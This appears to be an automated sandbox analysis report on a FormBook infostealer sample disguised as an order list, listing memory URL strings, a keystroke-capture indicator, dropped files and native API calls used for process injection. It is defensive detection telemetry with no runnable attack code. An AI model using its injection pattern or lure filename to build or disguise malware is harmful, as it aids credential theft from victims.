Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
Source: svchost.exe, 0000000C.00000000.7216767200.0000022382300000.00000004.sdmpString found in binary or memory: https:///WAB-23B4D62B-952A-47E7-969C-B95DBF145D3D.local
Source: svchost.exe, 0000000C.00000000.7222384094.0000022382ACC000.00000004.sdmpString found in binary or memory: https:///live.com
Source: svchost.exe, 0000000C.00000000.7222384094.0000022382ACC000.00000004.sdmpString found in binary or memory: https:///windows.net
Source: svchost.exe, 0000000C.00000000.7222384094.0000022382ACC000.00000004.sdmpString found in binary or memory: https:///xboxlive.com
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuer
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600ssuer
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=806016
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=806042
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmpString found in binary or memory: https://account.live.com/msangcwam
Source: svchost.exe, 0000000C.00000000.7222384094.0000022382ACC000.00000004.sdmpString found in binary or memory: https://login.live.com
Source: svchost.exe, 0000000C.00000000.7222384094.0000022382ACC000.00000004.sdmpString found in binary or memory: https://login.live.com/
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmpString found in binary or memory: https://login.live.com/#
Source: svchost.exe, 0000000C.00000000.7225158697.0000022382F5E000.00000004.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfenterp
Source: svchost.exe, 0000000C.00000002.7727688812.0000022382600000.00000004.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502t
Source: svchost.exe, 0000000C.00000000.7220824340.00000223827C2000.00000004.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000000C.00000000.7216767200.0000022382300000.00000004.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 0000000C.00000000.7225158697.0000022382F5E000.00000004.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srfenter
Source: svchost.exe, 0000000C.00000000.7225158697.0000022382F5E000.00000004.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srfnter
Source: svchost.exe, 0000000C.00000000.7220071449.00000223826F2000.00000004.sdmpString found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 0000000C.00000002.7733974123.0000022382E83000.00000004.sdmpString found in binary or memory: https://login.live.com/RST2.srfHHHHnPE
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmpString found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033=9
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: svchost.exe, 0000000C.00000002.7731087063.0000022382A75000.00000004.sdmp, svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfs
Source: svchost.exe, 0000000C.00000000.7212068986.00000223814D9000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfettings
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfing
Source: svchost.exe, 0000000C.00000000.7225158697.0000022382F5E000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 0000000C.00000000.7220071449.00000223826F2000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cplive.com
Source: svchost.exe, 0000000C.00000000.7211361054.0000022381455000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfdatesns
Source: svchost.exe, 0000000C.00000002.7731087063.0000022382A75000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=806034
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604suer
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfRS5sys
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502Issuer
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600-
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806035
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605Issuer
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806069
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 0000000C.00000000.7217036538.0000022382376000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cplStores
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 0000000C.00000000.7217036538.0000022382376000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 0000000C.00000000.7220824340.00000223827C2000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfer
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf.
Source: svchost.exe, 0000000C.00000000.7220538911.0000022382781000.00000004.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf/
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmpString found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmpString found in binary or memory: https://login.windows.net
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmpString found in binary or memory: https://login.windows.net/
Source: svchost.exe, 0000000C.00000002.7717714077.00000223814A0000.00000004.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmpString found in binary or memory: https://tarifrechner.heise.de/widget.phpprodukt=dsl
Source: svchost.exe, 0000000C.00000002.7727688812.0000022382600000.00000004.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
Source: svchost.exe, 0000000C.00000000.7222663782.0000022382D13000.00000004.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: 42LIST OF ITEMS TO ORDER.exe, 00000000.00000002.6509017647.00000000001B0000.00000004.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
FormBook malware detectedShow sources
Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\77P6C7R2\77Plogri.iniJump to dropped file
Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\77P6C7R2\77Plogrf.iniJump to dropped file
Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\77P6C7R2\77Plogrv.iniJump to dropped file
Initial sample is a PE file and has a suspicious nameShow sources
Source: initial sampleStatic PE information: Filename: 42LIST OF ITEMS TO ORDER.exe
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA240 NtReadFile,LdrInitializeThunk,3_2_00EEA240
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA3E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00EEA3E0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA360 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00EEA360
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA480 NtMapViewOfSection,LdrInitializeThunk,3_2_00EEA480
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA460 NtOpenProcess,LdrInitializeThunk,3_2_00EEA460
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA5F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00EEA5F0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA560 NtQuerySystemInformation,LdrInitializeThunk,3_2_00EEA560
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA540 NtDelayExecution,LdrInitializeThunk,3_2_00EEA540
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA6A0 NtCreateSection,LdrInitializeThunk,3_2_00EEA6A0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA610 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00EEA610
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA750 NtCreateFile,LdrInitializeThunk,3_2_00EEA750
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA720 NtResumeThread,LdrInitializeThunk,3_2_00EEA720
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA700 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00EEA700
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEB0B0 NtGetContextThread,3_2_00EEB0B0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA800 NtSetValueKey,3_2_00EEA800
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA2F0 NtQueryInformationFile,3_2_00EEA2F0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA2D0 NtClose,3_2_00EEA2D0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA260 NtWriteFile,3_2_00EEA260
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA220 NtWaitForSingleObject,3_2_00EEA220
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEBA30 NtSetContextThread,3_2_00EEBA30
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA3D0 NtCreateKey,3_2_00EEA3D0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA370 NtQueryInformationProcess,3_2_00EEA370
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA350 NtQueryValueKey,3_2_00EEA350
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA310 NtEnumerateValueKey,3_2_00EEA310
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEACE0 NtCreateMutant,3_2_00EEACE0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA4A0 NtUnmapViewOfSection,3_2_00EEA4A0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA470 NtSetInformationFile,3_2_00EEA470
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEB470 NtOpenThread,3_2_00EEB470
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA430 NtQueryVirtualMemory,3_2_00EEA430
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEB410 NtOpenProcessToken,3_2_00EEB410
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA410 NtQueryInformationToken,3_2_00EEA410
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA5A0 NtWriteVirtualMemory,3_2_00EEA5A0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEBD40 NtSuspendThread,3_2_00EEBD40
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA520 NtEnumerateKey,3_2_00EEA520
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA6D0 NtCreateProcessEx,3_2_00EEA6D0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA650 NtQueueApcThread,3_2_00EEA650
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA780 NtOpenDirectoryObject,3_2_00EEA780
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA710 NtQuerySection,3_2_00EEA710
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D6B50 NtCreateFile,3_2_003D6B50
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D6C00 NtReadFile,3_2_003D6C00
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D6D30 NtAllocateVirtualMemory,3_2_003D6D30
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D6B4A NtCreateFile,3_2_003D6B4A
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D6BFA NtReadFile,3_2_003D6BFA
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D6C7A NtReadFile,3_2_003D6C7A
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D6C4A NtReadFile,3_2_003D6C4A
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA470 NtSetInformationFile,LdrInitializeThunk,6_2_043BA470
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA460 NtOpenProcess,LdrInitializeThunk,6_2_043BA460
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA480 NtMapViewOfSection,LdrInitializeThunk,6_2_043BA480
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BACE0 NtCreateMutant,LdrInitializeThunk,6_2_043BACE0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA560 NtQuerySystemInformation,LdrInitializeThunk,6_2_043BA560
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BBD40 NtSuspendThread,LdrInitializeThunk,6_2_043BBD40
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA540 NtDelayExecution,LdrInitializeThunk,6_2_043BA540
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA5F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_043BA5F0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA610 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_043BA610
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA6A0 NtCreateSection,LdrInitializeThunk,6_2_043BA6A0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA750 NtCreateFile,LdrInitializeThunk,6_2_043BA750
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA800 NtSetValueKey,LdrInitializeThunk,6_2_043BA800
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA260 NtWriteFile,LdrInitializeThunk,6_2_043BA260
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA240 NtReadFile,LdrInitializeThunk,6_2_043BA240
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA310 NtEnumerateValueKey,LdrInitializeThunk,6_2_043BA310
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA360 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_043BA360
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA350 NtQueryValueKey,LdrInitializeThunk,6_2_043BA350
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA3E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_043BA3E0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA3D0 NtCreateKey,LdrInitializeThunk,6_2_043BA3D0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA430 NtQueryVirtualMemory,6_2_043BA430
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA410 NtQueryInformationToken,6_2_043BA410
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BB410 NtOpenProcessToken,6_2_043BB410
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BB470 NtOpenThread,6_2_043BB470
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA4A0 NtUnmapViewOfSection,6_2_043BA4A0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA520 NtEnumerateKey,6_2_043BA520
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA5A0 NtWriteVirtualMemory,6_2_043BA5A0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA650 NtQueueApcThread,6_2_043BA650
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA6D0 NtCreateProcessEx,6_2_043BA6D0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA720 NtResumeThread,6_2_043BA720
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA710 NtQuerySection,6_2_043BA710
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA700 NtProtectVirtualMemory,6_2_043BA700
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA780 NtOpenDirectoryObject,6_2_043BA780
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BB0B0 NtGetContextThread,6_2_043BB0B0
